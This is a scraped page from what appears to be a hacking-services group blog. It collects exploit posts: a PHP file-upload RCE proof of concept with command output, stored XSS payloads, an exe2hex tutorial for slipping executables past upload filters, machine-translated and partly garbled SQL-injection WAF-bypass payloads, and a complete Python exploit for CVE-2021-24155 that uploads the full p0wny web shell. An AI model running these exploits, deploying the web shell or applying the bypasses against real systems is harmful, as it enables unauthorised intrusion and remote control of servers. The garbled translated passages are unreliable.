Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863144735

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated)
# Date: 07/03/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html
# Version: 1.0
# Tested on: Windows 10
# CVE : N/A

# Proof of Concept :

1- Login any user account and change profile picture.
2- Upload any php shell by altering it's extension to .jpg or .png. (i.e test.php.jpg)
3- Before uploading your file, intercept your traffic by using any proxy.
4- Change test.php.jpg file to test.php and click forward.
5- Find your test.php file path and try any command.


###################### REQUEST ##########################################

GET /cman/members/uploads/test.php?cmd=SYSTEMINFO HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/cman/members/dashboard.php
Cookie: PHPSESSID=cne8l4ct93krjqobdus7nv2sjc

####################### RESPONSE #########################################

HTTP/1.1 200 OK
Date: Sat, 03 Jul 2021 11:28:16 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3
X-Powered-By: PHP/8.0.3
Content-Length: 4410
Connection: close
Content-Type: text/html; charset=UTF-8


Host Name:                 MRT
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19043 N/A Build 19043
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Murat  
System Boot Time:          6/25/2021, 2:51:40 PM
System Manufacturer:       Dell Inc.
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.


############################################################################
HireHackking 
# Exploit Title: Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS) 
# Date: 03 July 2021
# Exploit Author: Subhadip Nag
# Author Linkedin: www.linkedin.com/in/subhadip-nag-09/
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/
# Version: 1.1
# Tested on: Server: XAMPP

# Description #

Online Birth Certificate System 1.1 is vulnerable to stored cross site scripting (xss) in the registration form because of insufficient user supplied data.


# Proof of Concept (PoC) : Exploit #

1) Goto: http://localhost/OBCS/obcs/user/register.php
2) In the first name field, enter the payload: <script>alert(1)</script>
3) Click Register
4) Goto: http://localhost/OBCS/obcs/user/login.php
5) Enter your mobile number, password & click login
6) our XSS attack successfull

# PoC image
1) https://ibb.co/7C6g6nK
HireHackking

exe2hexbat is a Python script used to convert Windows PE executable files into batch files and vice versa.

Overview

exe2hex Encodes the executable binary file into ASCII text format. Then, transfer the results to the target computer (echoing the ASCII file is much easier than echoing the binary data). After exe2hex's output file is executed, restore the original program using or PowerShell (preinstalled on Windows by default). Files can be automatically transferred to the target computer using the built-in Telnet or WinEXE options in exe2hex. Binary EXE - ASCII Text - *Transfer* - Binary EXE 0y0zt04rqlc3850.png

Quick start

-x Use file or STDIN ( /path/to/binary-program.exe-s)-b to output to BATch/or PoSH (-b file.bat-p powershell.cmd)

Usage Example

Create BATch PowerShell file: Here I wrote an exe program casually

exe2hex -x chaos.exe lrfsfdekneh3857.png

As you can see, exe2hex converts the exe file into cmd and bat files.a3o0jkuklzh3870.pngCompress file exe2hex -x chaos.exe -b nc.txt -cc

[*] exe2hex v1.5.1

[i] Attempting to clone and compress

[i] Creating temporary file /tmp/tmp509bq1bl

[+] Compression (strip) was successful! (0.0% saved)

upx: /tmp/tmp509bq1bl: NotCompressibleException

[+] Compression (UPX) was successful! (0.0% saved)

[+] Successfully written (BATch) /root/Desktop/nc.txt vfcvpyiv3uy3882.png

Help

-h,--help #Show help information and exit

-x EXE #EXE binary file conversion

-s #Read from STDIN

-b BAT #BAT output file (DEBUG.exe method-x86)

-p POSH #PoSh output file (PowerShell method -x86/x64)

-e #URL encoding output

-r TEXT #pRefix - Text added before each line of command

-f TEXT #suFfix - Text added after each line of command

-l INT #Maximum hexadecimal value per row

-c #Clone and compress files before conversion (use -cc for higher compression)

-t # Create an Expect file to automatically perform Telnet sessions.

-w # Create an Expect file to automatically execute WinEXE sessions.

-v #Enable detailed mode

Main uses:

Convert binary programs to ASCII hexadecimal files, which can be restored using the built-in operating system program. Works on older and newer versions of Windows without pre-installing any third-party programs. Supports x86 and x64 operating systems. You can use DEBUG.exe or PowerShell to restore files. Ability to compress files before conversion. URL encodes the output. Option to add prefix and suffix text to each line. Ability to set the maximum hexadecimal length for each row. You can use binary files or pipelines in standard input (). STDIN is automatically transmitted via Telnet and/or WinEXE.

Telnet login

exe2hex.py -x chaos.exe -b chaos.bat -t 2co1rpxzmdx3908.png

At this time, a /chao-bat-telnet file will be generated for remote connection.

The format is as follows:/klogger-bat-telnet ip username password

./chao-bat-telnet 192.168.123.1 admin admin

Welcome to Microsoft Telnet Service

login: winxp

password:

*======================================================================================

Welcome to Microsoft Telnet Server.

*======================================================================================

C:\Documents and Settings\winxpcd %TEMP%

C:\DOCUME~1\winxp\LOCALS~1\Tempecho 418671.0klogger.bat

418671.0E~1\winxp\LOCALS~1\Temptype klogger.bat

C:\DOCUME~1\winxp\LOCALS~1\Temp

Postscript

exe2hex actually writes our commonly used programs or scripts into batch files such as txt cmd bat. Because some machines' WAF will restrict file upload/download exe. So a method is proposed to bypass these defense mechanisms using exe2hex. Transform it into an encoded form, and finally construct exe again and execute it.

HireHackking

SQL注入でWAFをバイパスする9つの方法

0x01はじめに

WAFは従来のファイアウォールとは異なります。WAFは特定のWebアプリケーションのコンテンツをフィルタリングできるのに対し、従来のファイアウォールはサーバー間の防御ゲートとして機能します。 HTTPトラフィックをチェックすることにより、SQLインジェクション、クロスサイトスクリプト(XSS)、ファイル包含、セキュリティ構成エラーなどのブロッキングなどのWebアプリケーションセキュリティの脆弱性から保護できます。

0x02 WAF作業原理

§例外プロトコルの検出:HTTP標準に準拠していないリクエストを拒否する

§入力検証の強化:クライアント側の検証だけでなく、プロキシとサーバー側の検証

§ホワイトリストとブラックリスト

§ルールベースと例外保護:ルールベースのメカニズムは、より黒ベースで柔軟な例外です

§国家管理:防衛セッション保護(Cookie保護、反侵入回避技術、対応監視、情報開示保護)。

0x03バイパスwaf

1。Casechangeの混合悪意のある入力トリガーWAF保護をトリガーし、WAFがケースに敏感なブラックリストを使用している場合、このフィルターをバイパスする可能性があります。

http://target.com/index.php?page_id=15ユニオン選択1,2,3,4

2。キーワードを交換します(wafで削除される特殊文字を挿入)---選択は、選択する場合があります。特殊文字が削除されると、Selectで実行されます。

http://Target.com/index.php?page_id=15nbsp; uniunionon selselectect 1,2,3,4

3。エンコードpage.php?id=1%252f%252a*/union%252f%252a

/選択

ヘキサデシマルエンコーディング:Target.com/index.php?page_id=15

/*!u%6eion*//*!se%6cect*/1,2,3,4…select(extractvalue(0x3c613e61646d696e3c2f613e、0x2f61))

:id=10%d6 '%20and%201=2%23選択

'ä'='a'; #1

4。攻撃文字列にコメントを使用します------コメントを挿入します。例えば/*! select */はWAFで無視される場合がありますが、ターゲットアプリケーションに渡されると、MySQLデータベースによって処理されます。

index.php?page_id=-15

%55NION/**/%53Elect 1,2,3,4

'Union%A0Select Pass fromユーザー#

index.php?page_id=-15

/*!Union*//*!Select*/1,2,3

?page_id=null%0a/** //*!50000%55nion*//*yoyu*/all/**/%0a/*!%53Elect*/%0a/*nnaa*/+1,2,3,4…

5。同等の機能とコマンド---キーワード検出のためにいくつかの関数またはコマンドを使用することはできませんが、多くの場合、同等または類似のコードを使用できます。

hex()、bin()==

ascii()

sleep()==benchmark()

concat_ws()==group_concat()

substr((select 'password')、1,1)

=0x70

strcmp(左( 'パスワード'、1)、

0x69)=1

strcmp(左( 'パスワード'、1)、

0x70)=0

strcmp(左( 'パスワード'、1)、

0x71)=-1

mid()、substr()

==substring()

@@ user==user()

@@ datadir==datadir()

5。特別なシンボル----特別なシンボルには、特別な意味と使用法があります

+ `symbol: select` version() `;

++-:Select+ID-1+1.ユーザーから。

+ @:Select @^1.Fromユーザー;

+mysql function()as xxx

+ `、〜、 @、%、()、[]、 - 、 +、|、%00

例:

'se'+'lec'+’t'

%s%e%l%e%c%t 1

1.aspx?id=1; exec( 'ma'+'ster.x'+'p_cm'+'dsh'+'ell

「ネットユーザー」 ')

'または - +2= - !' 2

id=1+(uni)(on)+(sel)(ect)

7。HTTPパラメーター汚染------複数のパラメーター=値を視聴およびバイパスするために値の値を提供します。 http://example.com?id=1?d='または' 1 '=' 1 ' - ' - 'in(例えば、Apache/PHPを使用する)を考えると、アプリケーションは最後の(2番目の)ID=のみを解析し、WAFは最初のID=のみを解析します。これは合理的な要求のように思えますが、アプリケーションは依然として悪意のある入力を受信して処理します。今日のほとんどのWAFは、HTTPパラメーター汚染(HPP)の影響を受けませんが、まだ試してみる価値があります。

hpp(httpパラメーター分析): /?id=1; select+1,2,3+from+users+where+id=1—

/?id=1; select+1amp; id=2,3+from+users+where+id=1—

/?id=1/**/union/*amp; id=*/select/*amp; id=*/pwd/*amp; id=*/from/*amp; id=*/usershppは繰り返しパラメーター公害としても知られています。

=3。この場合、異なるWebサーバーは次のように処理します:ozm4g4gd2cx9096.gifHPF(HTTPパラメーターセグメンテーション):この方法は、CRLFと同様のHTTPセグメンテーションインジェクションです(コントロール文字0A、%0Dなどを使用します。

/?a=1+union/*amp; b=*/select+1、pass/*amp; c=*/from+users--

a=1から *を選択します

Union/*およびb=*/select 1、pass/* limit*/fromユーザー -

HPC(HTTPパラメーター汚染):

RFC2396は次の文字を定義します。

unsurved: a-z、a-z、0-9および_。 〜 * '()

予約済み: /? @ amp;

=+ $、

賢明な: {} | \ ^ [] `

異なるWebサーバー処理プロセスには、特別なリクエストの構築時に異なるロジックがあります。マジック文字のための32kbuxpwmsl9097.gif%ASP/ASP.NETは影響を受けますpev4h2jgroh9098.gif

8。バッファオーバーフロー--- WAFは常にアプリケーションであり、他のアプリケーションと同じソフトウェアの欠陥を受けやすい。バッファオーバーフローの脆弱性が発生した場合、コードの実行を引き起こさない場合でも、WAFがクラッシュする可能性があります。WAFが適切に実行される可能性があります。

?id=1および(select 1)=(select

0xa*1000)+Union+Select+1,2、version()、4,5、database()、user()、8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26

9.統合統合とは、さまざまなバイパス技術を使用することを意味します。単一のテクノロジーはフィルタリングメカニズムをバイパスできない場合がありますが、さまざまなテクノロジーを使用してそれらを混合する可能性が大きくなります。

Target.com/index.php?page_id=15+and+ (Select

1)=([0xaa]を選択します[.(約1000を追加します

'a').])+/*!union*/+/*!select*/+1,2,3,4…

id=1/*!union*/+select+1,2、concat(/*!table_name*/)+from

/* information_schema*/.tables/*!where*/+/*!table_schema*/+like+database() -

?id=-725+/*!union*/+/*!select*/+1、group_concat(column_name)、3,4,5+from+/*!Information_schem*/。columns+where+table_name=0x41646d696e------

参照リンク:https://vulnerablelife.wordpress.com/2014/12/18/web-application-firewall-bypass-techniques/

wiz_tmp_tag id='wiz-table-range-border' contentedable='false' style='display: none;'

HireHackking
# Exploit Title: Church Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS) # Date: 07/03/2021 # Exploit Author: Murat DEMIRCI (@butterflyhunt3r) # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html # Version: 1.0 # Tested on: Windows 10 # Proof of Concept : #Payload: <img src=x onerror=alert(1)> #Injectable parameters : amount= and trcode= ###################### REQUEST ########################################## POST /cman/members/Tithes.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 85 Origin: http://localhost Connection: close Referer: http://localhost/cman/members/Tithes.php Cookie: PHPSESSID=cne2l4cs96krjqpbpus7nv2sjc Upgrade-Insecure-Requests: 1 amount=<img+src%3dx+onerror%3dalert(1)>&trcode=<img+src%3dx+onerror%3dalert(1)>&save=
HireHackking
# Exploit Title: Wordpress Plugin Backup Guard 1.5.8 - Remote Code Execution (Authenticated) # Date 02.07.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://backup-guard.com/products/backup-wordpress # Software Link: https://downloads.wordpress.org/plugin/backup.1.5.8.zip # Version: Before 1.6.0 # Tested on: Ubuntu 18.04 # CVE: CVE-2021-24155 # CWE: CWE-434 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24155/README.md ''' Description: The plugin did not ensure that the imported files are of the SGBP format and extension, allowing high privilege users (admin+) to upload arbitrary files, including PHP ones, leading to RCE. Additional Info, and Bypass of .htaccess protection found by WPScanTeam, while confirming the issue: There is a protection in place against accessing the uploaded files, via a .htaccess in the wp-content/uploads/backup-guard/ folder, however: - Some web servers do not support .htaccess, e.g Nginx, making it useless in such case - Arbitrary content can be appended to the existing .htaccess, to make the deny from all invalid, and bypass the protection on web servers such as Apache Note: v1.6.0 forced the uploaded file to have the .sgbp extension by adding it if not present, but the file content is not verified, which could still allow chaining with an issue such as LFI or Arbitrary File Renaming to achieve RCE ''' ''' Banner: ''' banner = """ ______ _______ ____ ___ ____ _ ____ _ _ _ ____ ____ / ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \| || | / | ___| ___| | | \ \ / /| _| _____ __) | | | |__) | |_____ __) | || |_| |___ \___ \ | |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _| |___) |__) | \____| \_/ |_____| |_____|\___/_____|_| |_____| |_| |_|____/____/ * Wordpress Plugin Backup Guard < 1.6.0 - RCE (Authenticated) * @Hacker5preme """ print(banner) ''' Import required modules: ''' import requests import argparse ''' User-Input: ''' my_parser = argparse.ArgumentParser(description='Wordpress Plugin Backup Guard < 1.6.0 - RCE (Authenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH username = args.USERNAME password = args.PASSWORD print('') ''' Authentication: ''' session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' # Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } # Authenticate: print('') auth = session.post(auth_url, headers=header, data=body) auth_header = auth.headers['Set-Cookie'] if 'wordpress_logged_in' in auth_header: print('[+] Authentication successfull !') else: print('[-] Authentication failed !') exit() ''' Retrieve Token for backup: ''' token_url = "http://" + target_ip + ':' + target_port + wp_path + '/wp-admin/admin.php?page=backup_guard_backups' # Header (Token): header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://" + target_ip + ':' + target_port + wp_path + '/wp-admin/users.php', "Connection": "close", "Upgrade-Insecure-Requests": "1" } # Get Token: print('') print('[+] Grabbing unique Backup Plugin Wordpress Token:') token_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=backup_guard_backups' init_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/index.php' init_request = session.get(init_url).text token_request = session.get(token_url).text token_start_in = token_request.find('&token=') token_start_in = token_request[token_start_in + 7:] token = token_start_in[:token_start_in.find('"')] print(' -> Token: ' + token) ''' Exploit: ''' print('') print('[*] Starting Exploit:') exploit_url = "http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=' + token # Header (Exploit): header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=backup_guard_backups', "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------17366980624047956771255332862", "Origin": 'http://' + target_ip, "Connection": "close" } # Body (Exploit): Using p0wny shell: https://github.com/flozz/p0wny-shell body = "-----------------------------17366980624047956771255332862\r\nContent-Disposition: form-data; name=\"files[]\"; filename=\"shell.php\"\r\nContent-Type: image/png\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-thumb {\n border-radius: 8px;\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n background-color: #bcbcbc;\n }\n\n #shell {\n background: #222;\n max-width: 800px;\n margin: 50px auto 0 auto;\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n font-size: 10pt;\n display: flex;\n flex-direction: column;\n align-items: stretch;\n }\n\n #shell-content {\n height: 500px;\n overflow: auto;\n padding: 5px;\n white-space: pre-wrap;\n flex-grow: 1;\n }\n\n #shell-logo {\n font-weight: bold;\n color: #FF4180;\n text-align: center;\n }\n\n @media (max-width: 991px) {\n #shell-logo {\n font-size: 6px;\n margin: -25px 0;\n }\n\n html, body, #shell {\n height: 100%;\n width: 100%;\n max-width: none;\n }\n\n #shell {\n margin-top: 0;\n }\n }\n\n @media (max-width: 767px) {\n #shell-input {\n flex-direction: column;\n }\n }\n\n @media (max-width: 320px) {\n #shell-logo {\n font-size: 5px;\n }\n }\n\n .shell-prompt {\n font-weight: bold;\n color: #75DF0B;\n }\n\n .shell-prompt > span {\n color: #1BC9E7;\n }\n\n #shell-input {\n display: flex;\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n border-top: rgba(255, 255, 255, .05) solid 1px;\n }\n\n #shell-input > label {\n flex-grow: 0;\n display: block;\n padding: 0 5px;\n height: 30px;\n line-height: 30px;\n }\n\n #shell-input #shell-cmd {\n height: 30px;\n line-height: 30px;\n border: none;\n background: transparent;\n color: #eee;\n font-family: monospace;\n font-size: 10pt;\n width: 100%;\n align-self: center;\n }\n\n #shell-input div {\n flex-grow: 1;\n align-items: stretch;\n }\n\n #shell-input input {\n outline: none;\n }\n </style>\n\n <script>\n var CWD = null;\n var commandHistory = [];\n var historyPosition = 0;\n var eShellCmdInput = null;\n var eShellContent = null;\n\n function _insertCommand(command) {\n eShellContent.innerHTML += \"\\n\\n\";\n eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n eShellContent.innerHTML += escapeHtml(command);\n eShellContent.innerHTML += \"\\n\";\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _insertStdout(stdout) {\n eShellContent.innerHTML += escapeHtml(stdout);\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _defer(callback) {\n setTimeout(callback, 0);\n }\n\n function featureShell(command) {\n\n _insertCommand(command);\n if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n } else if (/^\\s*clear\\s*$/.test(command)) {\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n eShellContent.innerHTML = '';\n } else {\n makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n if (response.hasOwnProperty('file')) {\n featureDownload(response.name, response.file)\n } else {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n }\n });\n }\n }\n\n function featureHint() {\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\n\n function _requestCallback(data) {\n if (data.files.length <= 1) return; // no completion\n\n if (data.files.length === 2) {\n if (type === 'cmd') {\n eShellCmdInput.value = data.files[0];\n } else {\n var currentValue = eShellCmdInput.value;\n eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n }\n } else {\n _insertCommand(eShellCmdInput.value);\n _insertStdout(data.files.join(\"\\n\"));\n }\n }\n\n var currentCmd = eShellCmdInput.value.split(\" \");\n var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n var fileName = (type === \"cmd\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n makeRequest(\n \"?feature=hint\",\n {\n filename: fileName,\n cwd: CWD,\n type: type\n },\n _requestCallback\n );\n\n }\n\n function featureDownload(name, file) {\n var element = document.createElement('a');\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n element.setAttribute('download', name);\n element.style.display = 'none';\n document.body.appendChild(element);\n element.click();\n document.body.removeChild(element);\n _insertStdout('Done.');\n }\n\n function featureUpload(path) {\n var element = document.createElement('input');\n element.setAttribute('type', 'file');\n element.style.display = 'none';\n document.body.appendChild(element);\n element.addEventListener('change', function () {\n var promise = getBase64(element.files[0]);\n promise.then(function (file) {\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n });\n }, function () {\n _insertStdout('An unknown client-side error occurred.');\n });\n });\n element.click();\n document.body.removeChild(element);\n }\n\n function getBase64(file, onLoadCallback) {\n return new Promise(function(resolve, reject) {\n var reader = new FileReader();\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n reader.onerror = reject;\n reader.readAsDataURL(file);\n });\n }\n\n function genPrompt(cwd) {\n cwd = cwd || \"~\";\n var shortCwd = cwd;\n if (cwd.split(\"/\").length > 3) {\n var splittedCwd = cwd.split(\"/\");\n shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n }\n return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n }\n\n function updateCwd(cwd) {\n if (cwd) {\n CWD = cwd;\n _updatePrompt();\n return;\n }\n makeRequest(\"?feature=pwd\", {}, function(response) {\n CWD = response.cwd;\n _updatePrompt();\n });\n\n }\n\n function escapeHtml(string) {\n return string\n .replace(/&/g, \"&\")\n .replace(/</g, \"<\")\n .replace(/>/g, \">\");\n }\n\n function _updatePrompt() {\n var eShellPrompt = document.getElementById(\"shell-prompt\");\n eShellPrompt.innerHTML = genPrompt(CWD);\n }\n\n function _onShellCmdKeyDown(event) {\n switch (event.key) {\n case \"Enter\":\n featureShell(eShellCmdInput.value);\n insertToHistory(eShellCmdInput.value);\n eShellCmdInput.value = \"\";\n break;\n case \"ArrowUp\":\n if (historyPosition > 0) {\n historyPosition--;\n eShellCmdInput.blur();\n eShellCmdInput.value = commandHistory[historyPosition];\n _defer(function() {\n eShellCmdInput.focus();\n });\n }\n break;\n case \"ArrowDown\":\n if (historyPosition >= commandHistory.length) {\n break;\n }\n historyPosition++;\n if (historyPosition === commandHistory.length) {\n eShellCmdInput.value = \"\";\n } else {\n eShellCmdInput.blur();\n eShellCmdInput.focus();\n eShellCmdInput.value = commandHistory[historyPosition];\n }\n break;\n case 'Tab':\n event.preventDefault();\n featureHint();\n break;\n }\n }\n\n function insertToHistory(cmd) {\n commandHistory.push(cmd);\n historyPosition = commandHistory.length;\n }\n\n function makeRequest(url, params, callback) {\n function getQueryString() {\n var a = [];\n for (var key in params) {\n if (params.hasOwnProperty(key)) {\n a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n }\n }\n return a.join(\"&\");\n }\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", url, true);\n xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n xhr.onreadystatechange = function() {\n if (xhr.readyState === 4 && xhr.status === 200) {\n try {\n var responseJson = JSON.parse(xhr.responseText);\n callback(responseJson);\n } catch (error) {\n alert(\"Error while parsing response: \" + error);\n }\n }\n };\n xhr.send(getQueryString());\n }\n\n document.onclick = function(event) {\n event = event || window.event;\n var selection = window.getSelection();\n var target = event.target || event.srcElement;\n\n if (target.tagName === \"SELECT\") {\n return;\n }\n\n if (!selection.toString()) {\n eShellCmdInput.focus();\n }\n };\n\n window.onload = function() {\n eShellCmdInput = document.getElementById(\"shell-cmd\");\n eShellContent = document.getElementById(\"shell-content\");\n updateCwd();\n eShellCmdInput.focus();\n };\n </script>\n </head>\n\n <body>\n <div id=\"shell\">\n <pre id=\"shell-content\">\n <div id=\"shell-logo\">\n ___ ____ _ _ _ _ _ <span></span>\n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|<span></span>\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|<span></span>\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| <span></span>\n|_| |___/ \\____/ <span></span>\n </div>\n </pre>\n <div id=\"shell-input\">\n <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n <div>\n <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n </div>\n </div>\n </div>\n </body>\n\n</html>\n\r\n-----------------------------17366980624047956771255332862--\r\n" session.post(exploit_url, headers=header, data=body) print('[+] Exploit done !') print(' -> Webshell uploaded to: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/backup-guard/shell.php') print('')
HireHackking

Simple Client Management System 1.0 - Remote Code Execution (RCE)

HACKER · %s · %s

